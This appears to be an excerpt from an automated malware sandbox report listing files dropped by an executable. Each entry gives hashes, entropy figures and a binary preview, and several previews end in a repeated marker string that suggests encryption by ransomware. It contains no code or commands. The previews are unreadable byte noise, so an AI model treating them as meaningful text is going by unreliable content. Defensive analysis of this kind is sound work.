              Preview:(()=>.Z...6j..( .]H...Y.=".Anb.o........].....(..U".iL...A..gY..[Y.....:..9.d..5*o1L..d8..R..,.A.-...M.C....3h......0..}A..62.h. ...G......^d.....y.-..,..*.pN.F..5.|..B_+.x5.j....A.3..M....v../`....F...VV../..E+.8{..`D.Z...fw:3&...pE..L>...........z.F......4.`.YZ.Z@B...4.=....Ab.>.gn..]....uVQ}P...P..?..."u.)....?...lGY.`2+Vp{:.(.8kU.{..H>...x.......3..,la..|c^.p.jW..mM.....7.qd.&.$&.E......#............P(.k%...y...u..!....Y......E.g..W>e.|"i....._WiLS.3....<..].d..E.o......v1.......Lk..>..=....K.t;_L.. z..E9e=F"..DV.o\..L.hL...W.8....7.....+.....k.=...W:..3..Q".b.\wc.4;.....:Z..t6*C.D.!.~59{(.}.A.0...:k...\c.w.q...vz7Q.5....=..........O.L$x........"...2.mZ:.#A...>{....R..../1..F.{.1..Fm.l.?:...t.e..O.L......<.~...V..Zm.PeUo0.@.@hyF6jl..n..[.H3.%....H|F..U<B.#r.'....Z1.k.R........{>...^5....t......s.*.,_...V#Q.w/..."......*X;gqy.`...o....s.j...]...1 2v$.a..ZH...HXx.%.......X...}.V^...R^l.|=h.....f.....=.......W.m..b]..S.Z!TP..!#F.s.$.Y&..o..1...ZT
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1197
              Entropy (8bit):7.842073604251145
              Encrypted:false
              SSDEEP:24:96Nq4G/Er9sdSqSUqOmnw0ABOOx0dkqOYc0E1s9B0/MPtvb7sd+bD:Ecn/g9HqSVnnSZ0CqODJ1sj0EPdbu8D
              MD5:F840C09A192009FEFA15837FC6375D3F
              SHA1:1D4A3A5931C3EDF837D536AAAC7F73A621855F74
              SHA-256:1DFA5F09617828C9F2C021CABE604F79C86AE913DC59BC1F0DEF2329AF33D5CE
              SHA-512:B363064EF12A8B47430C51B0C52A46ED799E6248BB4C3BE99501EB84D1C174D16A3B2801D0DA41E177426DEB5A11147FE7FC6D8143154A199004D835EDBC5A03
              Malicious:false
              Preview:(()=>..T<.o...bR.Z:....;#..... ..C..!......M..&.!.T....USV.k..F/Tm.e9q......Y.u/{.^.0...]&.)G5........I.B.............Y..Wt...../......+$U.......K.d.Gp..f2..I.@.SZS..z~6.p..8..C.t'..>.R6~6.5..U....<......W.K.?}.4..>5.D*..T.Gne86y...a..I.....|.{.q8.i.-.v..c...5=5..q..n....pX;G..Fw.RZ.w...|.?.Z...Q>3.%.a........W.JC..U....\.N....#.c...N...c..g.a.\..Qs.N..Q..YFl.....L.Ke]...jM...._.>.....(...V...{...)).f:.S#...._..H.2.h.i..#...-...N....P.....P.Z.r...]...W?......Y....h.p...#...w....I.N..U.L..a..s..V.....J......\I..9...i4&....+K.<".n.}... ..gs.uF[...R.8...6....%[.%.~.......S.,....v..7.T...Q.E...........0.\..Z...W.?.......*...........u....w.VE....h.8..E.+..$...K....?(.4$.........l=.X.....X/hL}/~....ai..}h......Z.y...(..~..R..........jY'..}J..A..@....2.k.8.^..R.%.9.M-^.h./#..i}.B..a.....0t...0...=E...$......@.:D. ~...C*o....n....z1..6.a.A[.."i.9..L...aB.00..nA...[.....x.Z.....x....x.=,1n.YN.QQ/..I.$..%8S.|..o6...>.#~.....z$.]u.<+x......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):5656
              Entropy (8bit):7.968287220894594
              Encrypted:false
              SSDEEP:96:TWco+Xp9wbdg4q33B69MiG05P8xeKyHe2mYw7jDxj0jB8Vrqvz/E3ycCAt3:DoSp8ZqB6iidXKeT8h0jGVevLEcAt3
              MD5:B88CCD477F24D030BAA0117ED565A09A
              SHA1:62BD9A5EBF7D559B02CAE657946D016696EC1521
              SHA-256:77E3F4294A652153D253EB2F415AFC23BDD775A0669815764516C53362E67563
              SHA-512:B6E628740D34858DD2E16771546645249BF48CF021A6C28BB09FC5BFB21975F4B1C22CFC5ED0CF1A5E94681B45EF97DF7960B9C82AD71A60D9FD4014164E72C5
              Malicious:false
              Preview:(()=>.)...&VEt..v.t..V.Z]\...,...7...P..g>`..q.N.....+.........V..x.N8.............:'...N...D6....9..W2............l}....n.!.EC.....+..._..{...M...~.zd.})..........<.^.......=|.~.n...#...E...1iH[.H.O.z.k..MY+@.K" .....A..b.v..6).x7.... ......E-z7.6e..l^..p (Q.......$.....:.......q..O..e(...^\.*].8.0.~.~..q....kK!.!..@.j..#d.........?.v...........0&.(..].Ih.]M.>.v.......M."......{.{.......G...?...s]..x.q...H.-.A........#H..s..z...+......j.. ....X=..?4O"2.....@-.}.+..t#...MhuJg..O..K.Au..j..6r..F..z.!K..}~1U.'.g&..U.R......,I.7BB...".....0..V.~..9..##...|..5.7......8{.V...B!.......;.v.).1....?...^gJ.V..X.F^.Xy<...1..?ZM.T....).uZ../....LZ.......i..}N..P...z.....L..5O.(_.5r...|p.!{g.F.{W...=..k.$>h.o..OBV.j.N..<|..q. X.*x."..........H.p....kNJ...o..i..R..US._.U..."..f..O..W3.]..5I.!).l...:o.I`."Z.4y.VVm...ua,.A.d:.L..hh...!RX 4.I?..A`....X[....=..)..p...J...-n.....>..l..Mf..*..?C..2.W.hdR..........2b....!H`....Q...z...........,9.._....u.\
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.29706319412396
              Encrypted:false
              SSDEEP:6:S/ipzKzEfPauZKIhFRkulrxerpkVrUSO/kyRdOmjG1XAmSdxa3cii96Z:uiRpyunHx4rpYrUTxSMGEdxa3cii9a
              MD5:77EC1EE614E8D0B7585040F5A8078D6D
              SHA1:BE584389790522FEEF5B61A18EFE3ABDDC00ABEB
              SHA-256:FDEF5ECBA0064AAD350D7F84C9037340F27073044EDDDF5331CE2ACE338FCAA2
              SHA-512:5AF62C0CEB7C3957436D19006BC7494B75CAA004E09AB6210F8D1ED5CC8752B13689723420DCDC3D9354EF66D02153E017A2E831D0777DAB37D1568F2B00C2DC
              Malicious:false
              Preview:1.DD98.T..K......?.........<. O.t#.T..|.g.//....L....\.*.7....n......&.z.Y......u.3....A.....|.H...1..ThA.L`.c.(A.Y.......b..,.......-.Z..O."'.f*...n...l..8.P..T.k.G.?A.l..f..D.....J..y...e.8..h....gi.........p.|d...x.T.;..F.w><.&M.~l.L...<.8..h.K.J&_..r.....t..sx.YX2...C%....o..I..4.F..<..$.OvMbp.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):469
              Entropy (8bit):7.524194342243355
              Encrypted:false
              SSDEEP:12:MWgxbGxllyt1amh86JjKa4YjIef60TMbV8OPEdxa3cii9a:MWgxyxlw1aO86JGa5jjf60Qbwd+bD
              MD5:605061BD73AE3924BC26EFD661D2F4B1
              SHA1:D8BAB11CE6511AED3014136D1CB537B7B9BEE597
              SHA-256:0D1DD8524B2ABC497C2AEFC1945F001808A504F038E6C86FD3D932E7DD2734FA
              SHA-512:5364F91481A1970A6508B9F3F0E09526CBBB1326E392564AAF03D0E3D4E39D37AEB0F77B336794F93C3A4BBB21ACC4704AABA57548E1946A11821886C39330AF
              Malicious:false
              Preview:.{...[..O..Us......LoH..C....O........d....Z^|..;..J..2.."b)..M....>..GP.....c..&...3.....D...V...v)Z<0.1...Yn..../.`....*..Co.aT....Q..QL.......KI.P@.,......]...j.d%....*.....7A=.....w.#/..kw.Y.nyc...W.....I...-..A.[J.k...K..a....a..u..k_...z.R{..{..4lp[.[`7....D3.^g...I>.i..`.j.f.../...Gn..+..y./6 t.......N.?..Q.vKa.ILR.u.B7<A...1.'.N.Q.s3.>.m...lr.81.d...db.m.../.KpgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2741
              Entropy (8bit):7.932174006782979
              Encrypted:false
              SSDEEP:48:xILUIpkI9U28+ltu6EHXd6AUdfugBpn9Ze0RT/QsSvK42BLLQ8D:xILQ28L6UXQ8gBp9Y0JIsSinLp
              MD5:CC65CE9203C8E169C71EB9560050DA2A
              SHA1:7CD66E8563CDF07AEEEA787CEC7C16A0F6D3F1BE
              SHA-256:3285F7A1281CAE7FCC95FAD4165E02B04A5BCF465156E85FD7A2516F47887D87
              SHA-512:30DA117591FA7977BE06C4B6EAF9045E17F06224E65C83546B31CFED68CFDBFD5E4045EE522DD4DF8FE86746F9D2D6DA9CCB3BA9B4E913BD18727528AD7EB8EF
              Malicious:false
              Preview:/**. ..6.....X.C.X.mA..\k.;.!j....j.h..A......#Xz.....AZ..Z.U.H...I'HU*a.Q RA.'7..g.pq./oG...Z..`.}iHy.?\..b..)...G.b.a..#3.....(.ID6.C.a...g.!t.....P..;s%iQ.K.X...C.5I.b.;..u..?..s.k.........o..\?..r.,..;..}..}..yM!H..I|.l...vk..._.W.-....a.d.8..v~." .L..E!..b......"}..._....KiU1..@.F[t6$E..;.{.=.....Q..>.f...H2`9Z...'....~..../.e...J....9..>.?n......s.K.j.nJ..?'.]...$.:..\.!...Z|...h?....3w'd..$.....!y.^p... V..P...c..)2..f...o.^.".i....G0W...iKi_$#<7.'..#..e......j4...H.*:[....Zx...3....<8.w.v.m...~..5.....4........!(.?m.2.1.6....H..~..[C.gsk...Q\Y.,.R%;..7...hl.s{b$...M.[....T..Y...I(x........W..<...G...r.e..>...{"sy.2..8X...B7.........-.\&...N..4...+D.._g.?.....H..M..M`.U....{.7f. 6(.1bK.%.....E..Usz.)...O..K...h...-...Iv1....\..4.d>....L...y..B...].7....j.....z.......S......w..V...........[..yn#......{.5...O..2RK....._#..p.x..j'....b....7.I.q.8..(tT#[.3...z.va..%.sxe.a"".Y..o. ...I=K....m}6.?.....Z4...h..5h.K.G..4.tcOg.A......0.2
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):6185
              Entropy (8bit):7.968880297376921
              Encrypted:false
              SSDEEP:96:doxkpeYNFfmMfG74XeAP8B33z9UPzmcecJp5uqk6EEW2zzghWZVMi9g+JD64GP:dpPF7na3D9UPDec1uqNs2fUWZZ9r5tu
              MD5:25E324A51B409493784A551F8CF6769A
              SHA1:7AF1F8C8478CEF4A680F4820CC395C5504D957E0
              SHA-256:C1C51B7AD67B3BA444F86B7F863D52823829F3EC278B0CC93D090C7D842BF1E3
              SHA-512:761B6C044B33464088E7695408A74FB0AD9E3B9AB792A1CFD0DFAC003B4007839E179D81CEE32C5AA2CDAC5006DD5B71D3D37A02BD9C76C3006B7E1B8A83C486
              Malicious:false
              Preview:/**. ..a.....L.|_Rp...)...g......D...T(....c| x.M....Z..B..{.2.X<.k...TuY.~K4I.y.m..q.B.I_K.K...0.(J.tHR.Q....T...k.u.=....Z.@<..:....c3.T.......i.....-..^.g...$.d.~fYBc.W.$...l...L.s.++.......[../...92.......gW.#.~nKx%....G.iai..:..^....n.{W....E.0kxi.vV.%.G..f..|.)mMm..a.}Z..Z.y({.y....~.q...../..$..c@...Lv..m...S..?k..v`e.H.B.....,.......6.c....W.L.9.1.+...@..@...H>........a.~x..uTs..5..t...~`...5.Fs3X^.L..g..?D..wz&z..*..MG.=..k..v.c....?. :.6.v...N@O.^.SRl./..Nz.s..e......_..hH+CW..C..0q.Q.[..N...E...Ny.4w.t+..s. ....[8.&8d.6...\..C............ .]..............<....{..3w\.>.V..TU.g...;......x..........meq......u..Q...hF.An..........|R.........3O.Y3S.....l;E..~Y....#U...>..mo.....j.%x..(..y..P.m.....I.V..*.2...v....[J...9;..3{.1Z....]....u...\W3...$.|I.YA.fj..1.EY...-..B|..gM.......Gg...]..b.....{......;.#`...!...;.=....[h...'.A_......OG\..tU..x.,..#.g..\...T1&..<....N<.xKv.-YAx,.E..|.^.C..>.d..(N.-.....H.r...*<S5H..~.l..x1!Zm..}b
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):540
              Entropy (8bit):7.534444285188477
              Encrypted:false
              SSDEEP:12:Z88GzJEdEkerN+yIeecAMcCUYksm+3FTqJDtczRns7gKdxa3cii9a:ZHsEGkmNZcCBx13pqPqsDd+bD
              MD5:A1948CD73EEA1C62881DFCECA9E8D906
              SHA1:96782F0F402E195E2508CE2BB04B6E868B588412
              SHA-256:182231DFC0D8A183153212708F8B365B1837202FE8AED6FAADEF2B4F1563BA47
              SHA-512:EF755922BB6292ACF00A20129E8D395A77AB0C07B79291E66FD8A681881D458337D4241FA5799CF4AF6BBD448A4011C2BDE82C1D188A7ABC12C46FCF1201F502
              Malicious:false
              Preview:windo{*.......EI.".?;...(...Z9"}...>.s...j...@.....{FL..5.. ..e...e...gqC.xXX.@k...i.d .2.)..u.@.7U.....g..a!....s..%..k.H.0....8..r......./..*RH.}j.NV.......f..gF......)..3K.Xh=kc...%....,.?....{..F....{j.....(3...yl.,..!.)M...CD+J...q}...F......gr....{wF..5..I?. s...r...!.. G...7YV.l..0..,.U8J2..-..@>..y.N}....$..d..V.O..v-....._D..'......h(........y].T....H..z........H.>S>`M9.....e..(.'._I..Z.O.I...../.8.Gx....K.......g..f.<....p8*..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):11876
              Entropy (8bit):7.983965556692407
              Encrypted:false
              SSDEEP:192:hmWaUnLosKQ6YOjlZzii0OOk3IShocZCeYuKMWn1+xA87ICYWEzhlmE:hLaULaYePmiemocZCeAMWn1+xZ70PmE
              MD5:7E81C57C8697CBC9C363A3C86C4B35E4
              SHA1:E55DA79A9E4EF2B4A63248C69A5CE1B8E2A8756C
              SHA-256:F40F03ABCEC869731C7F1E73A5F26F63923D2FBDDD67FAA3A706DD81AE1547B6
              SHA-512:3BE6510B8DB50C542A99CFBE38C5DDBEE8C8EDD36594EC1C9D03B73CEB45301D7D5BFF77FD1EFD90E48DC89710795B695EFC7AADBFB2D9156AC7A73654A9C7F6
              Malicious:false
              Preview:!func.....P..#..].....d.V*......?.<.....\um.1....S..e7......6.".."..V....G.w....:....&.....0o'...B...qm..n....~./.A...Y......[....sZ...n......0..."W9....&~.0.....\*...'A.s..#d.r.-+....G.....BPeX?1...R].)....l....$...u.v...4cV0.-......n....;..@.g.wj?..g.'[:....(W..Y.H...D.{O9...08....$VX..t.4.../...A%..T.k.m.... .......G{..:.~..J..4.J..."(........2O.y.....GD]5...5.../.... ...S...uRf....i...A.v...Q,..H.....%.Z.y.; ./|.8.3..3.n.....!....x..P...X.}.d.Lp.._...c...a..O......_...O@...{.7............bv...r.;1..dr*...@C.<.9^J..v.@.(..,.R1S.H..J.......G.A.}..D.......?qE.H..?...D...j...1.#BF?..H.E.....o.......h.W..[....&..i.pf.cm.+.R\....W$k....Qd...^N=.,*..l........>....5rLu$EN..q.Lf.Ip{..&}.[H|...oe`.....TA.}3..9w../...l\.......>Ny..m......1v.jB..Y...+H<..3.r.+G../..9(.r.....S...C....%D>..uz%..tev]Z.7?n... .?......fc[........yt.,"a|4...4...[ R..R.l....;O....x...t]...nf...j.......@.....T\...u+.....~P.V..|&.f....<.e....;L.d... .x.ey.\%B!@.X..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):455
              Entropy (8bit):7.450342600303611
              Encrypted:false
              SSDEEP:12:2MG+w26Uc8f4ZZYc4AHgjkM9QnLgeYdxa3cii9a:2n2pDfoZYc4CgjkM9wYd+bD
              MD5:6F41BBAE11A7FC9D2D7CB51672EBE20B
              SHA1:CE42559F4D786ECDDBE3C4B4F29C54C0C7E856C2
              SHA-256:F87FBE321B9A163F3FA5DFACDA659880A9029DF31D4CD27EC60BB4902D9B97E0
              SHA-512:625E7F73BA47B91AAF89A176AD52531F4AC3C868CBA65E06943E9586FFC2CCCD9B7806BDF812F65A9EA26A57CDCF24EF4B7E3AA9BA38FF9363B711F6324EAEA2
              Malicious:false
              Preview:(self=.8.X..(..&......._...k{s.pa....k..k.,..B.....vT.l..J..'..Ur.Nl8S95o<:....O.K3..........7iQ=..0...&y.1t.';..aTo.c.`t.u&..Q.6......S...._.j.v...O....C.<..d...s..(,e"&y........6_i._..?.".tb..L...'.`E.lV.y?...........7g!C.-....[.s.~`.e&..++.....!=w.&.PR.a...<..b.C....A57..S....#.o...5.:...1dW..`..#........-.,M.A.M.+.e.........i.)up,....!...$.R...|..O +.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14677
              Entropy (8bit):7.987376132687056
              Encrypted:false
              SSDEEP:384:+YBUUX6y3sm5lIJVWpOAmW+y6gsNnG1C1HpxlNDWi9:P6qnlnofypsNnhHpxlND3
              MD5:54331C31E76A34BADE2238512BBE0638
              SHA1:B1D3F8B961AA30DF039E820C280E83A1DFE1BEC1
              SHA-256:E87DE54EFC90A64F80B4C7A32A0A9B4AC719CD01D25D600C53B155B5201DADCF
              SHA-512:B65F92A8960379AB03FAADC9B2D9DE412262636E4640F20AFC33F8CE39A5DEBB037D2C7F69B1D6299F29055DD75AD360EB1CB7CEA993C703E48CED1FD804F0E4
              Malicious:false
              Preview:eyJib$.....4R..d.+...S..rf.c.Td.............O...].O+;.S.b..T..>...A.D.|F.z...5R.....~`...b..n...y..b..t.R.....i......q...m.(....U..BM.4?...`....-......H.......4...;.=...4vq:{...}.a.w .!......vR.=....2....O_.......c....U..s.e....B..}t........@...#..u.o...Z.Yl,.s..;n..bB.......d.<..g_.[.3..\.m.<9........\s;[..MW...],Y..p.y.<..|m.M...,|{VX..".Z.8..&y...u.BA.S....U..S.f.H...x.s.t.Xu4m.y..z`.th.:4.t...."=x.#/R$....G).B.bR..Q...J.d.....;g...%.....:..J...y..O...c3.u.....D....^C...,C..9rS...r:.(...VH.9d.=.|.^...B.Q.4.o!>................*..{.F.y..j...S.|q.g...?..j..b.z..I..m....*..p+......Q|"e..J.B...j+f.?.......c..67.i.u...o....Zk.H(..&.~...M.1..|....2....s....>......pY..9.*.,z.P.#.iW......M.i..L..TA....p...,Px|..^..;i.N....7....k@3./dp...z.......q^...z.......8..qN.h.!1....>..w.. !......9u.......[9c=/.YM..>U7.p6...0w..-.j16.`T;.0.e..-.../..n.O.-............T..A..[. ..d.`)..sh.-:2.2..l.....E!.`.t..s`..\g/.........>t......u..j2..g...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1946360
              Entropy (8bit):6.064507285947546
              Encrypted:false
              SSDEEP:49152:gduMrT9ZVAgJVVgdsvtbJcbKPPNb4hbmPJHM0PBudM0:gdTrTf7NtNb4hQ0
              MD5:6F241F024C2BDBB51E80F2D250D20A47
              SHA1:748F08E6984F3323974C1460FA70C0AF75DA63D4
              SHA-256:44DA9921A50B77B8BDC9542ADC854367D1F7B5B945AEA655480A8CA074D0304D
              SHA-512:767DE10914E23384A4974D22F66F4BDF5F07E171A2BF5EF45B6C980DB84FE5BDA40FF23322D0919B416F92032B930DA91F81B80CBDF5ADA49582890231156EE1
              Malicious:false
              Preview:!funcJ.qGsW.6o..i.[..Zm...F...i.'.t.0.:.I.5.~k.D..O.\#$t.-..H...$.y..8;......... .3..?|....g...b`$...........u...!%&.Hml20...~p ...oAK/.....J/[..R(..X...a[..\@.\.0.". "'/.w.y..0.....pG....".`..A ...N.)5F".6......v.j.....L.....<.d.]<F.=./...X.r.~.B..y`.GL\......D...y.l...5......AA.f...W.......o~07y...p...1:..P.tQ.Z..TD6...G....D.Z.....D.Q.[.[..XM..*...}..>..LnX............QU%?M.;...8/..N.^'....c?...6.*.Co..#......p.l.h..-..=..F/.......c.|[|.j>..r....\6.V&)Qr.....)...g"5hW...*..!.w`.....7Xx....4x.u77;.u.Rw..jY......u)...p.G...,6...Wn.....IG..=....}..fb.@...wr.....T]s.9S.O.l.......J.......0L.q.F.%Yx[].N..5O..KC...>..4...W.;l.)......V...?>f...R....L.*...../.o.he.m.TB.......l.....].?..O......lN.P.S:t|,. i...Rv....../h......DI.;..x.W...wxI....b}&Q.\.....2...M+3.........U....]G..W....i.a....b.,.y..r...u..|6B..6z...a.c.....&....o..7PMvuH....0$T%..~v.........b...../..v.b2D..W1..2..8..dR..d8.z.-.."dR.g. .$.a..]'@e.Z..._.5._i[..n..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1309
              Entropy (8bit):7.84331998551027
              Encrypted:false
              SSDEEP:24:JhEIqsloFxrEDAWAMcfw/e5V/FcJDFjCYyWts7ybijLd+bD:7EBFdEkWlcfzL/FcfZdQR8D
              MD5:7D1E19A82F2E4F8EDD7EAF4FBAE8AA29
              SHA1:015EFF7CF93C0AAD2D5BE83AC266892FA77AD33B
              SHA-256:7638B3EF33F470E49F81E415C772A86A8D6C379643DC6A4111957F43030DFC9E
              SHA-512:0EDE741BE0D6ED32E723F1C9C568C80060A97321127D8702CE5B8D878BAD9F6CDFBB83DDFE5A4BDE70F949A036A273B66779FAEA93088A6CDC25A8FFD2B61E35
              Malicious:false
              Preview:eyJhc....s.x.....#p$...Rdo.[_.u....>^)+....,.G.....n.D.>J.I.A..(Z\....M.GorZ....>DK_eRbZ=.G...L.....Z5..0.e.....{.;@.^*...b!.5.V..&....SRj....G....?^Ai7......|..T...'......a...5-....M3....Gx.Y?+4.C.<G...mK#..[.oXR.j...cz.}`..f..K.B["etW5...."...5.Njw..._.N.xt..\.j....G..L}....qH.,...J.....<..`..`.......wf..>..).;.7.E6.P....o..\0.!.........t....8.PQ.l..f2.*.3&)N.?.t'.lSN....Xj..V.x.M.0b5.U.....BE!F..Q.#.O.)..Q.w...".l..B...N.+'..X!-:...............JK..>8.G~.X...XN..{.P5.....6..g..U6L...i...n....'O3...$.iyj._...K.......[J.P.../.TOe..s.?~..By$]H..1. w..#..~W3..Td.Nl...........*.Y.....;.Ty...h[.l@b....~q\....XaQ..R3._?..!...t....k.R.o..W{....I..4.....QX.`.&.r.Z.~.........IY<h...!D..;...+0y....u3.Y..h.J..Q&...J+.(.RN:.I....^F...K.--.7.Q){...i..0..~..N.-.....6c....7.z.W.d....h.32.J.`..R.}...........a...;}...1..j3..TO..<.P=..... iO.S....s.-E..D.-y*G..L/..R.V.SRd..S.....'%......L.6...0..3P.hJ......B......}=...r.W....*...=p...VKolb.b..[A.h..X....3.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):18629
              Entropy (8bit):7.989400571641105
              Encrypted:false
              SSDEEP:384:PrL+scjKZzHUlI/B9bHjUWhOleStBL5GaVZVNhl:PrL+sLzHx/B9jdhObtf
              MD5:BA315E440636124B2F5029584E248990
              SHA1:CB86119CC97E4F4D58B93BB1F27F5406B9DA4001
              SHA-256:610F59E73E6DB4FC959CFE219F048480A1430B9D17613716245E814B0E8B7DEA
              SHA-512:2D8FC94BE2CA3C8C95453754538A91C08443A42F0B6ED05B039737A8010B6B310895AF7C8D4C77E1F8B2488E4BBFC26110DE8277AE7D5FCE8748414FEB272627
              Malicious:false
              Preview:{. "vv....`X.K.V....3.-.r.R...l....Q.-.?...-%'..qH.x5.q..#.......WS7...."h.........p....oW..y'...$.]...h7.o.o..j..9.......'.#.5......I'f.e..)+];.....b.....D/....Z.....5.....zY5.H..T...%oD.......-........z/G...J........H.....U...............tq....$..5z..!._.R.....<j....#...H."........#A..oY!._&DZ....6.....5^.Ry.Q.HO3...8r..z.!... #..D..nv{.u.|?..._.+*.D.6.d.....[...q.z.W5.....n.'...h[.[/e.....vK...1.~...%..[..b...Z.R.*......~..H1....$s....,....I..;...2..Q.l..d.....A.e.......o.9......Vz.. .O...fU.|~...]8.+?.."s.V}..X...j....*.VLQ.h..3.......r...O. ...F...:=.A.......D....d.........`..{/.t.<...y*..2..f}.<..7K...mn....X....hn.uW..w.blL7....;E.....7L....~.}....=t"..r!hVf.+B`.i&..As4...(..s...C.....C..L..K......Fl.V.....b.Oq'..*o...G.......9w._..<..y.\."Y...z.w@.6.q..A$....W......,..B...|H...#l,]....s..(q!K0O.C...5....L...y .A...:..5.8(.A.^..{H~.z...... K..UXg.....EA.E.c.pgh..!...z...jc..A.Do9..c.....3a;..........W....|...X.......y...._
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):15335
              Entropy (8bit):7.988220317269166
              Encrypted:false
              SSDEEP:384:7FZtKP5znycGSlyEO5o7c/lPFHWlw+mW+hlwKKK64P4/6:9KP5zbnPcNPJvhhhNKK64i6
              MD5:A470DF82AF9B2EA5FB46AEF71EFA15C5
              SHA1:E604E6D018B56BAEDD3A6523E55DF567CA0DA9CA
              SHA-256:3A39978760048467E6AC660216A111254E6EC5853CE03FCAFBD646E360AF120F
              SHA-512:695741A4B45CCCC1FC30EB58C6C51DCEFD672BBAD7EB0CB8407A9312CAD72B40D01748AB62D3009C3A8224BC46C136DC4BDB4E8481F96ACC00FD5FD2757A8D52
              Malicious:false
              Preview:{. "..+...a.,|a.|15.'...l.....Q........Eq.O.......%.Jje...4..L.c<.1w.j..Y.h....2..Ne....c..l.g..lp;....gV.a....P.>(.[}x9S.ht....j....y....?..G..z.....S....K.........JQ...3.@?.t#.l.9.+......i.M.....X.VC4..V..k.7.%.{sD........$...8.XV.).,..!m|...R..-n..5.....R5...@.v..XF.kpf_.:......>S.E...R;e...ue...}.VD....s....%.45z.3..+..||.O1....)LL.n._".!...g.&.$%P.. .I.F.c.."Ip.?j...DT...7.SQ...I\.b..).Y<.T.Q...L........{........M......VM..w..}..,.2.........{|3].W.m..Y..z.../.A.![.l....6..|.....,z..t}..:.E.a+.r....f.|..^C2c.m}...%!r.u.... .+.,{.6.P.X.....A 4y...l.........G.......x.5..M..<.C,..6.J. ...N&.ms..~X..]V..BK.!......lj.z.Ha.G.{.-M..<3..M..({|...z|.i.........RM3@',_.w9.H....1j......%bB..b'e>.X...'....6cP..O.....\.s7q.S...S.sk..X..9..!.,)#..B.=..h.6@...J..x...aa[....?../H.GM..49..\......~$*.N....&.*1...-.Y.KG(.q.y!..=....5..Qm.cE}.x....:.L..j..d...I%OF..~9..:.f.v.....&.....X..|.7.<...*s...qH... ..C.1.&....9.b:iZ.2..?........1.^...A.#..|
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):13524
              Entropy (8bit):7.98455682834705
              Encrypted:false
              SSDEEP:192:nBYB+BnrtYiBG6jImSa94Dt3VY/oO9xeMFWhmLBBt0JfUdVkepqp:BpWlrt3VROXFxLBf0JfUdVLpy
              MD5:04B10CCA800F0A8C3008DDAC410058A3
              SHA1:395F8F24862190EDE7FA25DC94DA38D1FDBB7502
              SHA-256:33C2A20FFFBE29C984C459559E7BE6234609C444B539662171BA3B7A125CD7D1
              SHA-512:CBECC46E61E49FB595F75DF17BEF68D6FE2110EF9BD4D00066385C5332A2A900B9E7718CCA525CBA8C9F6DE5AE2353265E2D429C0FD71EDB36EABFBCE319BD2C
              Malicious:false
              Preview:{. "....^.q.>.0..0....%S.:.._d......-..p.d..Riwx....=...".....w..#!.._.....XX...'o...;.ip.C&X.z..Bz.."..)..._&...=. ....w..=.%.5.....~.$....L.........P.P..Q....,-.c).g.]~....?r.C\).2\.h..&6.K..Eg...+h.&.'.-8.Km\.1...0..L.......1K...0.H..I.9.m!....RN..p;=6...`..g[<.J.*..m.....\A...I..oZM ..AE... T....Y{..q+a..T.......=.`...~....P.a.JMZ.|..lv^.o.[.}.....0;.!...<i.kr......YnIj0!..A.PJ.S.......a'...g........[0.x.H.-.3..q.JUw8.$m.\.z.HV.......j.-=`e.p.._..'....~G.......h.......RQ0.#..En .j..C9!6..r.C..j..9...t....F2..|.......b4.b.4."..A.4h.j....T..5.7E..wS24......].0D4.(+..........U<.j.....Qa6ii.j.o.N..y..w.?/4,....G.9..'..yR./..Q.....mG...12.....C.p.Y.w....~,......8q.w0..<...9..Rl4.B........`rG.81...2i.Y.0...J...GZ$.."...../....*..J.:....(..@m..9..6.4........+.:.....5.k.8I..?1....u.v3..4.|,5....C.....(..,zA..qC......#p''.a.L?.|dQ...u...0.H.l!.9.......y6.(...].%.K..jZ(JY$..R.......u..[..Ih?..b..?.;.+.:......W..p!.x...o...4.lUt...uCc.7.z...z$X
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):14923
              Entropy (8bit):7.98840335990911
              Encrypted:false
              SSDEEP:384:i7W4/zIUJht9iTN3Oa+H1FMuoXK+IwOhpy3/qs3/pO5EMN:q7RhStOpo6kOhM/qWaEMN
              MD5:4E9E3A30104AE5869DED0404CE8F91BB
              SHA1:67FAA91A43BBF537B0069AA10EE83991452280CD
              SHA-256:C44B047727D60B5018DB9B52CE28886BDF53CAFB88B538D598A992DFB2BDCB17
              SHA-512:632E9306983BD796127330882C9EFD08EE0E24C0FA5035D2A164A8702708D1706341457481C095C07E513640A3807BE158AA18312C7A758CAF4DC9C32379AB54
              Malicious:false
